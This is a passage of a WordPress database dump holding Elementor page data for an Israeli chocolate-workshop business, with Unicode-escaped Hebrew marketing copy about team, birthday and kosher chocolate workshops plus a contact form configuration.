\\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d4\\u05d8\\u05d5\\u05d1\\u05d5\\u05ea, \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc\\u05db\\u05df \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05dc\\u05d1 \\u05e7\\u05e6\\u05ea \\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc, \\u05d0\\u05d5\\u05db\\u05dc \\u05d5\\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05de\\u05ea\\u05d5\\u05e7 \\u05dc\\u05de\\u05e6\\u05d1 \\u05e8\\u05d5\\u05d7 \\u05d8\\u05d5\\u05d1.<\\/p><p>\\u05d0\\u05d6 \\u05de\\u05d4 \\u05d3\\u05e2\\u05ea\\u05db\\u05df \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05e6\\u05e2\\u05d3 \\u05d0\\u05d7\\u05d3 \\u05e7\\u05d3\\u05d9\\u05de\\u05d4, \\u05d5\\u05dc\\u05d7\\u05d2\\u05d5\\u05d2 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea? \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05de\\u05d3\\u05dc\\u05d9\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d5\\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d1\\u05d9\\u05e7\\u05d5\\u05dd \\u05d1\\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05dc\\u05e4\\u05e0\\u05d9 \\u05d4\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d7\\u05ea\\u05d5\\u05e0\\u05d4. \\u05d4\\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05d0 \\u05e0\\u05e1\\u05e4\\u05e8\\u05d5\\u05ea \\u05d1\\u05e2\\u05e8\\u05d1 \\u05e9\\u05db\\u05d6\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd, \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea \\u05d5\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea<\\/h2><p>\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05e8\\u05d1\\u05d9\\u05dd \\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05e9\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e8\\u05d0\\u05e9 \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e8\\u05e2\\u05d9\\u05d5\\u05e0\\u05d5\\u05ea \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05d9\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd.<br \\/>\\u05e2\\u05e8\\u05d1\\u05d9 \\u05e6\\u05d5\\u05d5\\u05ea \\u05d5\\u05e6\\u05f3\\u05d5\\u05e4\\u05e8\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd \\u05d4\\u05e4\\u05db\\u05d5 \\u05e4\\u05d5\\u05e4\\u05d5\\u05dc\\u05d0\\u05e8\\u05d9\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e9\\u05e0\\u05d9\\u05dd \\u05d4\\u05d0\\u05d7\\u05e8\\u05d5\\u05e0\\u05d5\\u05ea, \\u05db\\u05d0\\u05e9\\u05e8 \\u05d4\\u05e8\\u05e6\\u05d5\\u05df \\u05dc\\u05e9\\u05de\\u05d7 \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05d5\\u05ea\\u05dd \\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e2\\u05d5\\u05de\\u05d3 \\u05d1\\u05de\\u05e8\\u05db\\u05d6.<\\/p><p>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d4\\u05d9\\u05d0 \\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05e0\\u05d4\\u05d3\\u05e8 \\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d2\\u05d1\\u05e9\\u05ea, \\u05dc\\u05e9\\u05d1\\u05d9\\u05e8\\u05ea \\u05d3\\u05d9\\u05e1\\u05d8\\u05e0\\u05e1 \\u05e2\\u05dd \\u05d4\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d5\\u05dc\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05e6\\u05d7\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea, \\u05e9\\u05ea\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05db\\u05dd \\u05d5\\u05de\\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05e6\\u05d3\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05d0 \\u05d4\\u05db\\u05e8\\u05ea\\u05dd.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3<\\/h2><p>\\\"\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4, \\u05d1\\u05dc\\u05d9 \\u05e2\\u05d5\\u05d2\\u05d4\\\" \\u05de\\u05e1\\u05e4\\u05e8 \\u05dc\\u05e0\\u05d5 \\u05d4\\u05e9\\u05d9\\u05e8 \\u05d4\\u05de\\u05e4\\u05d5\\u05e8\\u05e1\\u05dd, \\u05d0\\u05d1\\u05dc \\u05d1\\u05d8\\u05d7 \\u05e9\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05ea \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d1\\u05dc\\u05d9 \\u05de\\u05dc\\u05da \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd - \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<br \\/>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05d4\\u05d9\\u05d0 \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d5\\u05de\\u05d4\\u05e0\\u05d4 \\u05dc\\u05db\\u05dc \\u05d4\\u05d7\\u05d5\\u05d2\\u05d2\\u05d9\\u05dd. \\u05de\\u05d4 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d8\\u05d5\\u05d1 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05dc\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05d4\\u05e8\\u05d9 \\u05d1\\u05d8\\u05d7 \\u05ea\\u05e9\\u05d9\\u05de\\u05d5 \\u05db\\u05db\\u05d9\\u05d1\\u05d5\\u05d3 \\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea \\u05de\\u05dc\\u05d0\\u05d5\\u05ea \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d5\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05dc\\u05d0 \\u05e4\\u05e9\\u05d5\\u05d8 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05db\\u05dc \\u05d0\\u05dc\\u05d5 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd? \\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e6\\u05d0\\u05ea \\u05e2\\u05dd \\u05de\\u05dc\\u05d0\\u05d9 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d9\\u05e1\\u05e4\\u05d9\\u05e7 \\u05d2\\u05dd \\u05dc\\u05e7\\u05e4\\u05d4 \\u05e9\\u05dc \\u05d4\\u05d1\\u05d5\\u05e7\\u05e8 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4<\\/h2><p>\\u05d0\\u05dc\\u05d5 \\u05de\\u05db\\u05dd \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d9\\u05dd \\u05dc\\u05d3\\u05ea, \\u05d5\\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05e0\\u05d9\\u05dd \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d2\\u05dd \\u05d4\\u05dd \\u05d1\\u05d7\\u05d2\\u05d9\\u05d2\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d2\\u05d3\\u05d5\\u05dc\\u05d4, \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d1\\u05d7\\u05d5\\u05e8 \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea, \\u05d5\\u05dc\\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05d0\\u05dc\\u05d9\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05d0\\u05d5\\u05e8\\u05d7\\u05d9\\u05dd.<\\/p><p>\\u05db\\u05dc \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d4\\u05db\\u05e9\\u05e8\\u05d4 \\u05e8\\u05d1\\u05e0\\u05d9\\u05ea, \\u05d4\\u05e7\\u05de\\u05d7 \\u05e9\\u05e0\\u05de\\u05e6\\u05d0 \\u05d1\\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d4\\u05d5\\u05d0 \\u05e7\\u05de\\u05d7 \\u05de\\u05e0\\u05d5\\u05e4\\u05d4 \\u05db\\u05d4\\u05dc\\u05db\\u05d4, \\u05d5\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea \\u05d0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d1\\u05db\\u05dc\\u05d9\\u05dd \\u05d7\\u05d3 \\u05e4\\u05e2\\u05de\\u05d9\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05e4\\u05ea\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d7\\u05e9\\u05e9 \\u05d4\\u05db\\u05e9\\u05e8\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05db\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05d5\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05de\\u05d4\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05dc \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4.<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05de\\u05d5\\u05e9\\u05dc\\u05dd<\\/h2><p>\\u05dc\\u05e1\\u05d9\\u05db\\u05d5\\u05dd, \\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05df \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05d1\\u05d9\\u05dc\\u05d5\\u05d9 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9, \\u05dc\\u05d0 \\u05e1\\u05d8\\u05d3\\u05e0\\u05e8\\u05d8\\u05d9, \\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d5\\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05de\\u05dc\\u05de\\u05d3 \\u05d5\\u05de\\u05e2\\u05e9\\u05d9\\u05e8.<br \\/>\\u05e8\\u05d1\\u05d9\\u05dd \\u05d0\\u05d9\\u05e0\\u05dd \\u05de\\u05d5\\u05d3\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05da \\u05e9\\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d2\\u05dd \\u05d0\\u05dd \\u05d9\\u05e9 \\u05dc\\u05db\\u05dd \\u05e4\\u05d7\\u05d3 \\u05de\\u05de\\u05d8\\u05d1\\u05d7, \\u05d2\\u05dd \\u05d0\\u05ea \\u05d0\\u05ea\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05e9\\u05d5\\u05e8\\u05e4\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4, \\u05d5\\u05d2\\u05dd \\u05d0\\u05dd \\u05d0\\u05d9\\u05df \\u05dc\\u05db\\u05dd \\u05d2\\u05d9\\u05e9\\u05d4 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05de\\u05d4 \\u05e9\\u05d1\\u05d8\\u05d5\\u05d7, \\u05dc\\u05d4\\u05ea\\u05e2\\u05e1\\u05e7 \\u05e2\\u05dd \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2413,444,'_wp_page_template','elementor_header_footer'),(2414,444,'_elementor_edit_mode','builder'),(2415,444,'_elementor_data','[{\"id\":\"18f6a107\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"305b0fba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"50499c10\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4eb9f6ca\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2d2198b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"79ff081e\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea (\\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\/ \\u05d2\\u05d3\\u05d5\\u05dc\\u05d5\\u05ea)\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"cdcd955\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/groups-choco.jpg\",\"id\":104},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4d880f94\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d9\\u05d5\\u05dd \\u05db\\u05d9\\u05e3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d4\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4, \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d4\\u05db\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05dc\\u05d0\\u05d9\\u05d2\\u05d5\\u05d3 \\u05d7\\u05d1\\u05e8\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05d6\\u05d0\\u05ea \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05db\\u05d6\\u05d5 \\u05e9\\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05d1\\u05e7\\u05d1\\u05d5\\u05e6\\u05d4 \\u05d9\\u05ea\\u05d7\\u05dc\\u05e7\\u05d5 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05d5\\u05d9\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05e0\\u05d5\\u05ea \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d5\\u05ea \\u05e2\\u05dc\\u05d9\\u05d4\\u05dd, \\u05d4\\u05d7\\u05dc \\u05de\\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e2\\u05e8\\u05d1\\u05d5\\u05d1 \\u05d5\\u05d6\\u05d9\\u05dc\\u05d5\\u05e3 \\u05dc\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05e0\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8 \\u05e9\\u05d0\\u05ea\\u05dd \\u05e8\\u05d2\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05d9\\u05ea\\u05d5 \\u05e1\\u05dc\\u05d8, \\u05dc\\u05d0 \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d3\\u05e2\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7?\\u00a0<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"bebc84a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>\\u05de\\u05d4 \\u05e2\\u05d5\\u05d3 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e2\\u05d5\\u05e9\\u05d9\\u05dd?<\\/h3><ul><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea<\\/a><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd<\\/a><\\/u><u><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%d7%a1%d7%93%d7%a0%d7%aa-%d7%a9%d7%95%d7%a7%d7%95%d7%9c%d7%93-%d7%9c%d7%9e%d7%a1%d7%99%d7%91%d7%aa-%d7%a8%d7%95%d7%95%d7%a7%d7%95%d7%aa\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea<\\/a><\\/u><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fd9ed4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"16c16700\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"76bff3cc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\",\"recaptcha_badge\":\"bottomright\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\",\"recaptcha_badge\":\"bottomright\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\",\"recaptcha_badge\":\"bottomright\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from 